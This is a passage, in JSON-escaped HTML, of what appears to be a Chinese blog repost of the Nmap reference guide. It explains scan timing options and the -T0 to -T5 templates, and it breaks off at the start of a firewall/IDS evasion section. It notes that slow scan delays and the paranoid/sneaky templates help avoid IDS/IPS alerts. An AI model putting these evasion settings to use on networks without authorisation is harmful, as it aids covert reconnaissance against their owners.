\u52a0\u626b\u63cf\u65f6\u95f4\uff0c\u5982UDP\u626b\u63cf\u548c\u7248\u672c\u68c0\u6d4b\u3002\u540c\u6837\uff0c\u9632\u706b\u5899\u914d\u7f6e\u4ee5\u53ca\u7279\u6b8a\u7684\u54cd\u5e94\u901f\u5ea6\u9650\u5236\u4e5f\u4f1a \u589e\u52a0\u65f6\u95f4\u3002Nmap\u4f7f\u7528\u4e86\u5e76\u884c\u7b97\u6cd5\u548c\u8bb8\u591a\u5148\u8fdb\u7684\u7b97\u6cd5\u6765\u52a0\u901f\u626b\u63cf\uff0c\u7528\u6237\u5bf9Nmap\u5982\u4f55 \u5de5\u4f5c\u6709\u6700\u7ec8\u7684\u63a7\u5236\u6743\u3002\u9ad8\u7ea7\u7528\u6237\u53ef\u4ee5\u4ed4\u7ec6\u5730\u8c03\u6574Nmap\u547d\u4ee4\uff0c\u5728\u6ee1\u8db3\u65f6\u95f4\u8981\u6c42\u7684\u540c\u65f6\u83b7\u5f97\u4ed6\u4eec\u6240\u5173\u5fc3\u7684\u4fe1\u606f\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6539\u5584\u626b\u63cf\u65f6\u95f4\u7684\u6280\u672f\u6709\uff1a\u5ffd\u7565\u975e\u5173\u952e\u7684\u68c0\u6d4b\u3001\u5347\u7ea7\u6700\u65b0\u7248\u672c\u7684Nmap(\u6027\u80fd\u589e\u5f3a\u4e0d\u65ad\u6539\u5584)\u3002 \u4f18\u5316\u65f6\u95f4\u53c2\u6570\u4e5f\u4f1a\u5e26\u6765\u5b9e\u8d28\u6027\u7684\u53d8\u5316\uff0c\u8fd9\u4e9b\u53c2\u6570\u5982\u4e0b\u3002<code>--min-hostgroup &lt;milliseconds&gt;<\/code>;&nbsp;<code>--max-hostgroup &lt;milliseconds&gt;<\/code>&nbsp;(\u8c03\u6574\u5e76\u884c\u626b\u63cf\u7ec4\u7684\u5927\u5c0f)<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u5177\u6709\u5e76\u884c\u626b\u63cf\u591a\u4e3b\u673a\u7aef\u53e3\u6216\u7248\u672c\u7684\u80fd\u529b\uff0cNmap\u5c06\u591a\u4e2a\u76ee\u6807IP\u5730\u5740 \u7a7a\u95f4\u5206\u6210\u7ec4\uff0c\u7136\u540e\u5728\u540c\u4e00\u65f6\u95f4\u5bf9\u4e00\u4e2a\u7ec4\u8fdb\u884c\u626b\u63cf\u3002\u901a\u5e38\uff0c\u5927\u7684\u7ec4\u66f4\u6709\u6548\u3002\u7f3a \u70b9\u662f\u53ea\u6709\u5f53\u6574\u4e2a\u7ec4\u626b\u63cf\u7ed3\u675f\u540e\u624d\u4f1a\u63d0\u4f9b\u4e3b\u673a\u7684\u626b\u63cf\u7ed3\u679c\u3002\u5982\u679c\u7ec4\u7684\u5927\u5c0f\u5b9a\u4e49 \u4e3a50\uff0c\u5219\u53ea\u6709\u5f53\u524d50\u4e2a\u4e3b\u673a\u626b\u63cf\u7ed3\u675f\u540e\u624d\u80fd\u5f97\u5230\u62a5\u544a(\u8be6\u7ec6\u6a21\u5f0f\u4e2d\u7684\u8865\u5145\u4fe1\u606f \u9664\u5916)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u65b9\u5f0f\u4e0b\uff0cNmap\u91c7\u53d6\u6298\u8877\u7684\u65b9\u6cd5\u3002\u5f00\u59cb\u626b\u63cf\u65f6\u7684\u7ec4\u8f83\u5c0f\uff0c \u6700\u5c0f\u4e3a5\uff0c\u8fd9\u6837\u4fbf\u4e8e\u5c3d\u5feb\u4ea7\u751f\u7ed3\u679c\uff1b\u968f\u540e\u589e\u957f\u7ec4\u7684\u5927\u5c0f\uff0c\u6700\u5927\u4e3a1024\u3002\u786e\u5207\u7684 \u5927\u5c0f\u4f9d\u8d56\u4e8e\u6240\u7ed9\u5b9a\u7684\u9009\u9879\u3002\u4e3a\u4fdd\u8bc1\u6548\u7387\uff0c\u9488\u5bf9UDP\u6216\u5c11\u91cf\u7aef\u53e3\u7684TCP\u626b\u63cf\uff0cNmap \u4f7f\u7528\u5927\u7684\u7ec4\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>--max-hostgroup<\/code>\u9009\u9879\u7528\u4e8e\u8bf4\u660e\u4f7f\u7528\u6700\u5927\u7684\u7ec4\uff0cNmap\u4e0d \u4f1a\u8d85\u51fa\u8fd9\u4e2a\u5927\u5c0f\u3002<code>--min-hostgroup<\/code>\u9009\u9879\u8bf4\u660e\u6700\u5c0f\u7684\u7ec4\uff0cNmap \u4f1a\u4fdd\u6301\u7ec4\u5927\u4e8e\u8fd9\u4e2a\u503c\u3002\u5982\u679c\u5728\u6307\u5b9a\u7684\u63a5\u53e3\u4e0a\u6ca1\u6709\u8db3\u591f\u7684\u76ee\u6807\u4e3b\u673a\u6765\u6ee1\u8db3\u6240 \u6307\u5b9a\u7684\u6700\u5c0f\u503c\uff0cNmap\u53ef\u80fd\u4f1a\u91c7\u7528\u6bd4\u6240\u6307\u5b9a\u7684\u503c\u5c0f\u7684\u7ec4\u3002\u8fd9\u4e24\u4e2a\u53c2\u6570\u867d\u7136\u5f88\u5c11\u4f7f\u7528\uff0c \u4f46\u90fd\u7528\u4e8e\u4fdd\u6301\u7ec4\u7684\u5927\u5c0f\u5728\u4e00\u4e2a\u6307\u5b9a\u7684\u8303\u56f4\u4e4b\u5185\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u9009\u9879\u7684\u4e3b\u8981\u7528\u9014\u662f\u8bf4\u660e\u4e00\u4e2a\u6700\u5c0f\u7ec4\u7684\u5927\u5c0f\uff0c\u4f7f\u5f97\u6574\u4e2a\u626b\u63cf\u66f4\u52a0\u5feb\u901f\u3002\u901a\u5e38 \u9009\u62e9256\u6765\u626b\u63cfC\u7c7b\u7f51\u6bb5\u3002\u5bf9\u4e8e\u7aef\u53e3\u6570\u8f83\u591a\u7684\u626b\u63cf\uff0c\u8d85\u51fa\u8be5\u503c\u6ca1\u6709\u610f\u4e49\u3002\u5bf9\u4e8e \u7aef\u53e3\u6570\u8f83\u5c11\u7684\u626b\u63cf\uff0c2048\u6216\u66f4\u5927\u7684\u7ec4\u5927\u5c0f\u662f\u6709\u5e2e\u52a9\u7684\u3002<code>--min-parallelism &lt;milliseconds&gt;<\/code>;&nbsp;<code>--max-parallelism &lt;milliseconds&gt;<\/code>&nbsp;(\u8c03\u6574\u63a2\u6d4b\u62a5\u6587\u7684\u5e76\u884c\u5ea6)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u9009\u9879\u63a7\u5236\u7528\u4e8e\u4e3b\u673a\u7ec4\u7684\u63a2\u6d4b\u62a5\u6587\u6570\u91cf\uff0c\u53ef\u7528\u4e8e\u7aef\u53e3\u626b\u63cf\u548c\u4e3b\u673a\u53d1\u73b0\u3002\u9ed8\u8ba4\u72b6\u6001\u4e0b\uff0c Nmap\u57fa\u4e8e\u7f51\u7edc\u6027\u80fd\u8ba1\u7b97\u4e00\u4e2a\u7406\u60f3\u7684\u5e76\u884c\u5ea6\uff0c\u8fd9\u4e2a\u503c\u7ecf\u5e38\u6539\u53d8\u3002\u5982\u679c\u62a5\u6587\u88ab\u4e22\u5f03\uff0c Nmap\u964d\u4f4e\u901f\u5ea6\uff0c\u63a2\u6d4b\u62a5\u6587\u6570\u91cf\u51cf\u5c11\u3002\u968f\u7740\u7f51\u7edc\u6027\u80fd\u7684\u6539\u5584\uff0c\u7406\u60f3\u7684\u63a2\u6d4b\u62a5\u6587\u6570\u91cf\u4f1a\u7f13\u6162\u589e\u52a0\u3002 \u8fd9\u4e9b\u9009\u9879\u786e\u5b9a\u8fd9\u4e2a\u53d8\u91cf\u7684\u5927\u5c0f\u8303\u56f4\u3002\u9ed8\u8ba4\u72b6\u6001\u4e0b\uff0c\u5f53\u7f51\u7edc\u4e0d\u53ef\u9760\u65f6\uff0c\u7406\u60f3\u7684\u5e76\u884c\u5ea6\u503c \u53ef\u80fd\u4e3a1\uff0c\u5728\u597d\u7684\u6761\u4ef6\u4e0b\uff0c\u53ef\u80fd\u4f1a\u589e\u957f\u81f3\u51e0\u767e\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6700\u5e38\u89c1\u7684\u5e94\u7528\u662f<code>--min-parallelism<\/code>\u503c\u5927\u4e8e1\uff0c\u4ee5\u52a0\u5feb \u6027\u80fd\u4e0d\u4f73\u7684\u4e3b\u673a\u6216\u7f51\u7edc\u7684\u626b\u63cf\u3002\u8fd9\u4e2a\u9009\u9879\u5177\u6709\u98ce\u9669\uff0c\u5982\u679c\u8fc7\u9ad8\u5219\u5f71\u54cd\u51c6\u786e\u5ea6\uff0c\u540c\u65f6 \u4e5f\u4f1a\u964d\u4f4eNmap\u57fa\u4e8e\u7f51\u7edc\u6761\u4ef6\u52a8\u6001\u63a7\u5236\u5e76\u884c\u5ea6\u7684\u80fd\u529b\u3002\u8fd9\u4e2a\u503c\u8bbe\u4e3a10\u8f83\u4e3a\u5408\u9002\uff0c \u8fd9\u4e2a\u503c\u7684\u8c03\u6574\u5f80\u5f80\u4f5c\u4e3a\u6700\u540e\u7684\u624b\u6bb5\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>--max-parallelism<\/code>\u9009\u9879\u901a\u5e38\u8bbe\u4e3a1\uff0c\u4ee5\u9632\u6b62Nmap\u5728\u540c\u4e00\u65f6\u95f4 \u5411\u4e3b\u673a\u53d1\u9001\u591a\u4e2a\u63a2\u6d4b\u62a5\u6587\uff0c\u548c\u9009\u62e9<code>--scan-delay<\/code>\u540c\u65f6\u4f7f\u7528\u975e\u5e38\u6709\u7528\uff0c\u867d\u7136 \u8fd9\u4e2a\u9009\u9879\u672c\u8eab\u7684\u7528\u9014\u5df2\u7ecf\u5f88\u597d\u3002<code>--min-rtt-timeout &lt;milliseconds&gt;<\/code>\uff0c&nbsp;<code>--max-rtt-timeout &lt;milliseconds&gt;<\/code>\uff0c&nbsp;<code>--initial-rtt-timeout &lt;milliseconds&gt;<\/code>&nbsp;(\u8c03\u6574\u63a2\u6d4b\u62a5\u6587\u8d85\u65f6)<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u4f7f\u7528\u4e00\u4e2a\u8fd0\u884c\u8d85\u65f6\u503c\u6765\u786e\u5b9a\u7b49\u5f85\u63a2\u6d4b\u62a5\u6587\u54cd\u5e94\u7684\u65f6\u95f4\uff0c\u968f\u540e\u4f1a\u653e\u5f03\u6216\u91cd\u65b0 \u53d1\u9001\u63a2\u6d4b\u62a5\u6587\u3002Nmap\u57fa\u4e8e\u4e0a\u4e00\u4e2a\u63a2\u6d4b\u62a5\u6587\u7684\u54cd\u5e94\u65f6\u95f4\u6765\u8ba1\u7b97\u8d85\u65f6\u503c\uff0c\u5982\u679c\u7f51\u7edc\u5ef6\u8fdf\u6bd4\u8f83\u663e\u8457 \u548c\u4e0d\u5b9a\uff0c\u8fd9\u4e2a\u8d85\u65f6\u503c\u4f1a\u589e\u52a0\u51e0\u79d2\u3002\u521d\u59cb\u503c\u7684\u6bd4\u8f83\u4fdd\u5b88(\u9ad8)\uff0c\u800c\u5f53Nmap\u626b\u63cf\u65e0\u54cd\u5e94 \u7684\u4e3b\u673a\u65f6\uff0c\u8fd9\u4e2a\u4fdd\u5b88\u503c\u4f1a\u4fdd\u6301\u4e00\u6bb5\u65f6\u95f4\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u9009\u9879\u4ee5\u6beb\u79d2\u4e3a\u5355\u4f4d\uff0c\u91c7\u7528\u5c0f\u7684<code>--max-rtt-timeout<\/code>\u503c\uff0c\u4f7f&nbsp;<code>--initial-rtt-timeout<\/code>\u503c\u5927\u4e8e\u9ed8\u8ba4\u503c\u53ef\u4ee5\u660e\u663e\u51cf\u5c11\u626b\u63cf\u65f6\u95f4\uff0c\u7279\u522b \u662f\u5bf9\u4e0d\u80fdping\u901a\u7684\u626b\u63cf(<code>-P0<\/code>)\u4ee5\u53ca\u5177\u6709\u4e25\u683c\u8fc7\u6ee4\u7684\u7f51\u7edc\u3002\u5982\u679c\u4f7f\u7528\u592a \u5c0f\u7684\u503c\uff0c\u4f7f\u5f97\u5f88\u591a\u63a2\u6d4b\u62a5\u6587\u8d85\u65f6\u4ece\u800c\u91cd\u65b0\u53d1\u9001\uff0c\u800c\u6b64\u65f6\u53ef\u80fd\u54cd\u5e94\u6d88\u606f\u6b63\u5728\u53d1\u9001\uff0c\u8fd9\u4f7f\u5f97\u6574\u4e2a\u626b\u63cf\u7684\u65f6 \u95f4\u4f1a\u589e\u52a0\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u6240\u6709\u7684\u4e3b\u673a\u90fd\u5728\u672c\u5730\u7f51\u7edc\uff0c\u5bf9\u4e8e<code>--max-rtt-timeout<\/code>\u503c\u6765 \u8bf4\uff0c100\u6beb\u79d2\u6bd4\u8f83\u5408\u9002\u3002\u5982\u679c\u5b58\u5728\u8def\u7531\uff0c\u9996\u5148\u4f7f\u7528ICMP ping\u5de5\u5177ping\u4e3b\u673a\uff0c\u6216\u4f7f\u7528\u5176 \u5b83\u62a5\u6587\u5de5\u5177\u5982hpings\uff0c\u53ef\u4ee5\u66f4\u597d\u5730\u7a7f\u900f\u9632\u706b\u5899\u3002\u67e5\u770b\u5927\u7ea610\u4e2a\u5305\u7684\u6700\u5927\u5f80\u8fd4\u65f6\u95f4\uff0c\u7136\u540e\u5c06&nbsp;<code>--initial-rtt-timeout<\/code>\u8bbe\u6210\u8fd9\u4e2a\u65f6\u95f4\u76842\u500d\uff0c<code>--max-rtt-timeout<\/code>&nbsp;\u53ef\u8bbe\u6210\u8fd9\u4e2a\u65f6\u95f4\u503c\u76843\u500d\u62164\u500d\u3002\u901a\u5e38\uff0c\u4e0d\u7ba1ping\u7684\u65f6\u95f4\u662f\u591a\u5c11\uff0c\u6700\u5927\u7684rtt\u503c\u4e0d\u5f97\u5c0f\u4e8e100ms\uff0c \u4e0d\u80fd\u8d85\u8fc71000ms\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>--min-rtt-timeout<\/code>\u8fd9\u4e2a\u9009\u9879\u5f88\u5c11\u4f7f\u7528\uff0c\u5f53\u7f51\u7edc\u4e0d\u53ef\u9760\u65f6\uff0c Nmap\u7684\u9ed8\u8ba4\u503c\u4e5f\u663e\u5f97\u8fc7\u4e8e\u5f3a\u70c8\uff0c\u8fd9\u65f6\u8fd9\u4e2a\u9009\u9879\u53ef\u8d77\u4f5c\u7528\u3002\u5f53\u7f51\u7edc\u770b\u8d77\u6765\u4e0d\u53ef\u9760\u65f6\uff0cNmap\u4ec5\u5c06 \u8d85\u65f6\u65f6\u95f4\u964d\u81f3\u6700\u5c0f\u503c\uff0c\u8fd9\u4e2a\u60c5\u51b5\u662f\u4e0d\u6b63\u5e38\u7684\uff0c\u9700\u8981\u5411nmap-dev\u90ae\u4ef6\u5217\u8868\u62a5\u544abug\u3002<code>--host-timeout &lt;milliseconds&gt;<\/code>&nbsp;(\u653e\u5f03\u4f4e\u901f\u76ee\u6807\u4e3b\u673a)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u7531\u4e8e\u6027\u80fd\u8f83\u5dee\u6216\u4e0d\u53ef\u9760\u7684\u7f51\u7edc\u786c\u4ef6\u6216\u8f6f\u4ef6\u3001\u5e26\u5bbd\u9650\u5236\u3001\u4e25\u683c\u7684\u9632\u706b\u5899\u7b49\u539f\u56e0\uff0c \u4e00\u4e9b\u4e3b\u673a\u9700\u8981<em>\u5f88\u957f<\/em>\u7684\u65f6\u95f4\u626b\u63cf\u3002\u8fd9\u4e9b\u6781\u5c11\u6570\u7684\u4e3b\u673a\u626b\u63cf\u5f80\u5f80\u5360 \u636e\u4e86\u5927\u90e8\u5206\u7684\u626b\u63cf\u65f6\u95f4\u3002\u56e0\u6b64\uff0c\u6700\u597d\u7684\u529e\u6cd5\u662f\u51cf\u5c11\u65f6\u95f4\u6d88\u8017\u5e76\u4e14\u5ffd\u7565\u8fd9\u4e9b\u4e3b\u673a\uff0c\u4f7f\u7528&nbsp;<code>--host-timeout<\/code>\u9009\u9879\u6765\u8bf4\u660e\u7b49\u5f85\u7684\u65f6\u95f4(\u6beb\u79d2)\u3002\u901a\u5e38\u4f7f\u75281800000 \u6765\u4fdd\u8bc1Nmap\u4e0d\u4f1a\u5728\u5355\u4e2a\u4e3b\u673a\u4e0a\u4f7f\u7528\u8d85\u8fc7\u534a\u5c0f\u65f6\u7684\u65f6\u95f4\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cNmap\u5728\u8fd9\u534a\u5c0f\u65f6\u4e2d\u53ef\u4ee5 \u540c\u65f6\u626b\u63cf\u5176\u5b83\u4e3b\u673a\uff0c\u56e0\u6b64\u5e76\u4e0d\u662f\u5b8c\u5168\u653e\u5f03\u626b\u63cf\u3002\u8d85\u65f6\u7684\u4e3b\u673a\u88ab\u5ffd\u7565\uff0c\u56e0\u6b64\u4e5f\u6ca1\u6709\u9488\u5bf9\u8be5\u4e3b\u673a\u7684 \u7aef\u53e3\u8868\u3001\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u6216\u7248\u672c\u68c0\u6d4b\u7ed3\u679c\u7684\u8f93\u51fa\u3002<code>--scan-delay &lt;milliseconds&gt;<\/code>;&nbsp;<code>--max-scan-delay &lt;milliseconds&gt;<\/code>&nbsp;(\u8c03\u6574\u63a2\u6d4b\u62a5\u6587\u7684\u65f6\u95f4\u95f4\u9694)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u9009\u9879\u7528\u4e8eNmap\u63a7\u5236\u9488\u5bf9\u4e00\u4e2a\u4e3b\u673a\u53d1\u9001\u63a2\u6d4b\u62a5\u6587\u7684\u7b49\u5f85\u65f6\u95f4(\u6beb\u79d2)\uff0c\u5728\u5e26\u5bbd \u63a7\u5236\u7684\u60c5\u51b5\u4e0b\u8fd9\u4e2a\u9009\u9879\u975e\u5e38\u6709\u6548\u3002Solaris\u4e3b\u673a\u5728\u54cd\u5e94UDP\u626b\u63cf\u63a2\u6d4b\u62a5\u6587\u62a5\u6587\u65f6\uff0c\u6bcf\u79d2 \u53ea\u53d1\u9001\u4e00\u4e2aICMP\u6d88\u606f\uff0c\u56e0\u6b64Nmap\u53d1\u9001\u7684\u5f88\u591a\u6570\u63a2\u6d4b\u62a5\u6587\u662f\u6d6a\u8d39\u7684\u3002<code>--scan-delay<\/code>&nbsp;\u8bbe\u4e3a1000\uff0c\u4f7fNmap\u4f4e\u901f\u8fd0\u884c\u3002Nmap\u5c1d\u8bd5\u68c0\u6d4b\u5e26\u5bbd\u63a7\u5236\u5e76\u76f8\u5e94\u5730\u8c03\u6574\u626b\u63cf\u7684\u5ef6\u8fdf\uff0c\u4f46 \u5e76\u4e0d\u5f71\u54cd\u660e\u786e\u8bf4\u660e\u4f55\u79cd\u901f\u5ea6\u5de5\u4f5c\u6700\u4f73\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>--scan-delay<\/code>\u7684\u53e6\u4e00\u4e2a\u7528\u9014\u662f\u8eb2\u95ed\u57fa\u4e8e\u9608\u503c\u7684\u5165\u4fb5\u68c0\u6d4b\u548c\u9884\u9632 \u7cfb\u7edf(IDS\/IPS)\u3002<code>-T &lt;Paranoid|Sneaky|Polite|Normal|Aggressive|Insane&gt;<\/code>&nbsp;(\u8bbe\u7f6e\u65f6\u95f4\u6a21\u677f)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e0a\u8ff0\u4f18\u5316\u65f6\u95f4\u63a7\u5236\u9009\u9879\u7684\u529f\u80fd\u5f88\u5f3a\u5927\u4e5f\u5f88\u6709\u6548\uff0c\u4f46\u6709\u4e9b\u7528\u6237\u4f1a\u88ab\u8ff7\u60d1\u3002\u6b64\u5916\uff0c \u5f80\u5f80\u9009\u62e9\u5408\u9002\u53c2\u6570\u7684\u65f6\u95f4\u8d85\u8fc7\u4e86\u6240\u9700\u4f18\u5316\u7684\u626b\u63cf\u65f6\u95f4\u3002\u56e0\u6b64\uff0cNmap\u63d0\u4f9b\u4e86\u4e00\u4e9b\u7b80\u5355\u7684 \u65b9\u6cd5\uff0c\u4f7f\u75286\u4e2a\u65f6\u95f4\u6a21\u677f\uff0c\u4f7f\u7528\u65f6\u91c7\u7528<code>-T<\/code>\u9009\u9879\u53ca\u6570\u5b57(0 - 5) \u6216\u540d\u79f0\u3002\u6a21\u677f\u540d\u79f0\u6709paranoid (0)\u3001sneaky (1)\u3001polite (2)\u3001normal(3)\u3001 aggressive (4)\u548cinsane (5)\u3002\u524d\u4e24\u79cd\u6a21\u5f0f\u7528\u4e8eIDS\u8eb2\u907f\uff0cPolite\u6a21\u5f0f\u964d\u4f4e\u4e86\u626b\u63cf \u901f\u5ea6\u4ee5\u4f7f\u7528\u66f4\u5c11\u7684\u5e26\u5bbd\u548c\u76ee\u6807\u4e3b\u673a\u8d44\u6e90\u3002\u9ed8\u8ba4\u6a21\u5f0f\u4e3aNormal\uff0c\u56e0\u6b64<code>-T3<\/code>&nbsp;\u5b9e\u9645\u4e0a\u662f\u672a\u505a\u4efb\u4f55\u4f18\u5316\u3002Aggressive\u6a21\u5f0f\u5047\u8bbe\u7528\u6237\u5177\u6709\u5408\u9002\u53ca\u53ef\u9760\u7684\u7f51\u7edc\u4ece\u800c\u52a0\u901f \u626b\u63cf\u3002Insane\u6a21\u5f0f\u5047\u8bbe\u7528\u6237\u5177\u6709\u7279\u522b\u5feb\u7684\u7f51\u7edc\u6216\u8005\u613f\u610f\u4e3a\u83b7\u5f97\u901f\u5ea6\u800c\u727a\u7272\u51c6\u786e\u6027\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u7528\u6237\u53ef\u4ee5\u6839\u636e\u81ea\u5df1\u7684\u9700\u8981\u9009\u62e9\u4e0d\u540c\u7684\u6a21\u677f\uff0c\u7531Nmap\u8d1f\u8d23\u9009\u62e9\u5b9e\u9645\u7684\u65f6\u95f4\u503c\u3002 \u6a21\u677f\u4e5f\u4f1a\u9488\u5bf9\u5176\u5b83\u7684\u4f18\u5316\u63a7\u5236\u9009\u9879\u8fdb\u884c\u901f\u5ea6\u5fae\u8c03\u3002\u4f8b\u5982\uff0c<code>-T4<\/code>&nbsp;\u9488\u5bf9TCP\u7aef\u53e3\u7981\u6b62\u52a8\u6001\u626b\u63cf\u5ef6\u8fdf\u8d85\u8fc710ms\uff0c<code>-T5<\/code>\u5bf9\u5e94\u7684\u503c\u4e3a5ms\u3002 \u6a21\u677f\u53ef\u4ee5\u548c\u4f18\u5316\u8c03\u6574\u63a7\u5236\u9009\u9879\u7ec4\u5408\u4f7f\u7528\uff0c\u4f46\u6a21\u677f\u5fc5\u987b\u9996\u5148\u6307\u5b9a\uff0c\u5426\u5219\u6a21\u677f\u7684\u6807\u51c6\u503c \u4f1a\u8986\u76d6\u7528\u6237\u6307\u5b9a\u7684\u503c\u3002\u5efa\u8bae\u5728\u626b\u63cf\u53ef\u9760\u7684\u7f51\u7edc\u65f6\u4f7f\u7528&nbsp;<code>-T4<\/code>\uff0c\u5373\u4f7f \u5728\u81ea\u5df1\u8981\u589e\u52a0\u4f18\u5316\u63a7\u5236\u9009\u9879\u65f6\u4e5f\u4f7f\u7528(\u5728\u547d\u4ee4\u884c\u7684\u5f00\u59cb)\uff0c\u4ece\u800c\u4ece\u8fd9\u4e9b\u989d\u5916\u7684\u8f83\u5c0f\u7684\u4f18\u5316 \u4e2d\u83b7\u76ca\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u7528\u4e8e\u6709\u8db3\u591f\u7684\u5e26\u5bbd\u6216\u4ee5\u592a\u7f51\u8fde\u63a5\uff0c\u4ecd\u7136\u5efa\u8bae\u4f7f\u7528<code>-T4<\/code>\u9009\u9879\u3002 \u6709\u4e9b\u7528\u6237\u559c\u6b22<code>-T5<\/code>\u9009\u9879\uff0c\u4f46\u8fd9\u4e2a\u8fc7\u4e8e\u5f3a\u70c8\u3002\u6709\u65f6\u7528\u6237\u8003\u8651\u5230\u907f\u514d\u4f7f\u4e3b\u673a \u5d29\u6e83\u6216\u8005\u5e0c\u671b\u66f4\u793c\u8c8c\u4e00\u4e9b\u4f1a\u91c7\u7528<code>-T2<\/code>\u9009\u9879\u3002\u4ed6\u4eec\u5e76\u6ca1\u610f\u8bc6\u5230<code>-T Polite<\/code>\u9009\u9879\u662f\u5982\u4f55\u7684\u6162\uff0c\u8fd9\u79cd\u6a21\u5f0f\u7684\u626b\u63cf\u6bd4\u9ed8\u8ba4\u65b9\u5f0f\u5b9e\u9645\u4e0a\u8981\u591a\u82b110\u500d\u7684\u65f6\u95f4\u3002\u9ed8\u8ba4\u65f6\u95f4 \u9009\u9879(<code>-T3<\/code>)\u5f88\u5c11\u6709\u4e3b\u673a\u5d29\u6e83\u548c\u5e26\u5bbd\u95ee\u9898\uff0c\u6bd4\u8f83\u9002\u5408\u4e8e\u8c28\u614e\u7684\u7528\u6237\u3002\u4e0d\u8fdb\u884c \u7248\u672c\u68c0\u6d4b\u6bd4\u8fdb\u884c\u65f6\u95f4\u8c03\u6574\u80fd\u66f4\u6709\u6548\u5730\u89e3\u51b3\u8fd9\u4e9b\u95ee\u9898\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u867d\u7136<code>-T0<\/code>\u548c<code>-T1<\/code>\u9009\u9879\u53ef\u80fd\u6709\u52a9\u4e8e\u907f\u514dIDS\u544a\u8b66\uff0c\u4f46 \u5728\u8fdb\u884c\u4e0a\u5343\u4e2a\u4e3b\u673a\u6216\u7aef\u53e3\u626b\u63cf\u65f6\uff0c\u4f1a\u663e\u8457\u589e\u52a0\u65f6\u95f4\u3002\u5bf9\u4e8e\u8fd9\u79cd\u957f\u65f6\u95f4\u7684\u626b\u63cf\uff0c\u5b81\u53ef\u8bbe\u5b9a\u786e\u5207\u7684\u65f6\u95f4 \u503c\uff0c\u800c\u4e0d\u8981\u53bb\u4f9d\u8d56\u5c01\u88c5\u7684<code>-T0<\/code>\u548c<code>-T1<\/code>\u9009\u9879\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><code>T0<\/code>\u9009\u9879\u7684\u4e3b\u8981\u5f71\u54cd\u662f\u5bf9\u4e8e\u8fde\u7eed\u626b\u63cf\uff0c\u5728\u4e00\u4e2a\u65f6\u95f4\u53ea\u80fd\u626b\u63cf\u4e00\u4e2a\u7aef\u53e3\uff0c \u6bcf\u4e2a\u63a2\u6d4b\u62a5\u6587\u7684\u53d1\u9001\u95f4\u9694\u4e3a5\u5206\u949f\u3002<code>T1<\/code>\u548c<code>T2<\/code>\u9009\u9879\u6bd4\u8f83\u7c7b\u4f3c\uff0c \u63a2\u6d4b\u62a5\u6587\u95f4\u9694\u5206\u522b\u4e3a15\u79d2\u548c0.4\u79d2\u3002<code>T3<\/code>\u662fNmap\u7684\u9ed8\u8ba4\u9009\u9879\uff0c\u5305\u542b\u4e86\u5e76\u884c\u626b\u63cf\u3002&nbsp;<code>T4<\/code>\u9009\u9879\u4e0e&nbsp;<code>--max-rtt-timeout 1250 --initial-rtt-timeout 500<\/code>&nbsp;\u7b49\u4ef7\uff0c\u6700\u5927TCP\u626b\u63cf\u5ef6\u8fdf\u4e3a10ms\u3002<code>T5<\/code>\u7b49\u4ef7\u4e8e&nbsp;<code>--max-rtt-timeout 300 --min-rtt-timeout 50 --initial-rtt-timeout 250 --host-timeout 900000<\/code>\uff0c\u6700\u5927TCP\u626b\u63cf\u5ef6\u8fdf\u4e3a5ms\u3002\u4e00\u822c\u4f7f\u7528 -T4 \u9009\u9879 \u8fdb\u884c\u626b\u63cf \u6765\u63d0\u9ad8\u901f\u5ea6\u3002<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170516165754312?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe11\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe11\" \/><\/figure>\n\n\n<h1 class=\"wp-block-heading\">\u9632\u706b\u5899\/IDS\u8eb2\u907f\u548c\u6b3a\u9a97<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u9632\u706b\u5899\u7684\u539f\u7406\u56fe\uff1a<\/p>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/img-blog.csdn.net\/20170518135914026?watermark\/2\/text\/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvZnJlZWtpbmcxMDE=\/font\/5a6L5L2T\/fontsize\/400\/fill\/I0JBQkFCMA==\/dissolve\/70\/gravity\/Center\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe12\" alt=\"Nmap\u8be6\u7ec6\u53c2\u8003\u6307\u5357\u63d2\u56fe12\" \/><\/figure>\n\n\n<p 